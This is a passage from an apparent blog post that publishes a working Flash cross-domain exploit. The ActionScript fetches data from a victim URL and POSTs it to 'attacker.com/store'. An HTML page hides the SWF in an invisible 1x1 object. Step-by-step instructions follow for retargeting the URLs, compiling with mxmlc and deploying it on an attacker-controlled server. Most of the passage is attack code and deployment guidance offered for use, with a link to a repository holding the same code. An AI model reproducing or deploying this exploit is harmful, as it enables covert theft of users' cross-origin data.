<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>// Target URL from where the data is to be retrieved</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>var readFrom:String = "http://victim.com/supersecret";</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>var readRequest:URLRequest = new URLRequest(readFrom);</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>var getLoader:URLLoader = new URLLoader();</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>getLoader.addEventListener(Event.COMPLETE, eventHandler);</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>try {</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>getLoader.load(readRequest);</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>} catch (error:Error) {</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>trace("Error loading URL: " + error);</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<br />
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>private function eventHandler(event:Event):void {</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>// URL to which retrieved data is to be sent</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>var sendTo:String = "http://attacker.com/store";</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>var sendRequest:URLRequest = new URLRequest(sendTo);</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>sendRequest.method = URLRequestMethod.POST;</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>sendRequest.data = event.target.data;</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>var sendLoader:URLLoader = new URLLoader();</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>try {</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>sendLoader.load(sendRequest);</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>} catch (error:Error) {</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>trace("Error loading URL: " + error);</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">}</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<br />
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The following HTML file embeds the compiled SWF for delivery; the 1x1 object keeps it invisible on the hosting page.</span></div>
<div dir="ltr">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="638"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="background-color: #d9d9d9; border: 1px solid #000000; padding: 0px 7px 0px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 12pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><html></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><object type="application/x-shockwave-flash" data="XDomainXploit.swf" width="1" height="1"></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-left: 72pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><param name="movie" value="XDomainXploit.swf" /></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></object></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></html></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<br />
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The code, along with a README, is also available in a GitHub repository, which can be found </span><a href="https://github.com/gursev/flash-xdomain-xploit" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">here</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Compiling and deploying the ActionScript code</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I used the Apache Flex SDK to compile the ActionScript code; you can follow the steps below to get your exploit working.</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Download and install </span><a href="http://flex.apache.org/installer.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Apache Flex SDK</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> that comes with an ActionScript compiler.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Copy the ActionScript code to your local directory and name it XDomainXploit.as.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Change the values of the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">readFrom</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (victim URL to read) and </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">sendTo</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (URL that receives the retrieved data) variables to suit your target.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Compile the code into a SWF with </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">mxmlc</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, the compiler shipped with Apache Flex, by running the following command.</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">mxmlc XDomainXploit.as</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<ol start="5" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Deploy the generated SWF together with the HTML file above to a web server you control, then load the page to enjoy the Flash goodness.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqCmYEPRhK7_a_MYMVdmA26NPnQTs447jeYMfdherkQtuoq4Q7aNPHT_EYdNxddSbgW3u4_F2rN-ZbG9X2732q-efyuT1bZ4MnCr2K_oc79VUVOjUgY__Rqp2xzzic_h0bU7lkRUoa95xO/s1600/compiling.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqCmYEPRhK7_a_MYMVdmA26NPnQTs447jeYMfdherkQtuoq4Q7aNPHT_EYdNxddSbgW3u4_F2rN-ZbG9X2732q-efyuT1bZ4MnCr2K_oc79VUVOjUgY__Rqp2xzzic_h0bU7lkRUoa95xO/s400/compiling.png" width="400" /></a></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1; margin-bottom: 10pt; margin-top: 0pt;">
<div style="text-align: center;">
<span style="background-color: transparent; color: #4f81bd; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Figure 1: Image shows ActionScript compile operation</span></div>
</div>
<div dir="ltr" style="line-height: 1; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #4f81bd; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-left: 18pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Below you will see the exploit in action.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9av8p-Dt5apDb1-ConKL9O25-goB4U3oMy2bl012X_VSoqofhMWCM_pwHwNOI0Wti1URMXlUBnLg-fg9Fk3d8U4kzHzL8AGJuwYQ6s-wwRyXStnKeuHlnuiFPv8jle4El26Xg6cFCk1NR/s1600/proxy-sequence-labeled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9av8p-Dt5apDb1-ConKL9O25-goB4U3oMy2bl012X_VSoqofhMWCM_pwHwNOI0Wti1URMXlUBnLg-fg9Fk3d8U4kzHzL8AGJuwYQ6s-wwRyXStnKeuHlnuiFPv8jle4El26Xg6cFCk1NR/s400/proxy-sequence-labeled.png" width="400" /></a></div>
</div>
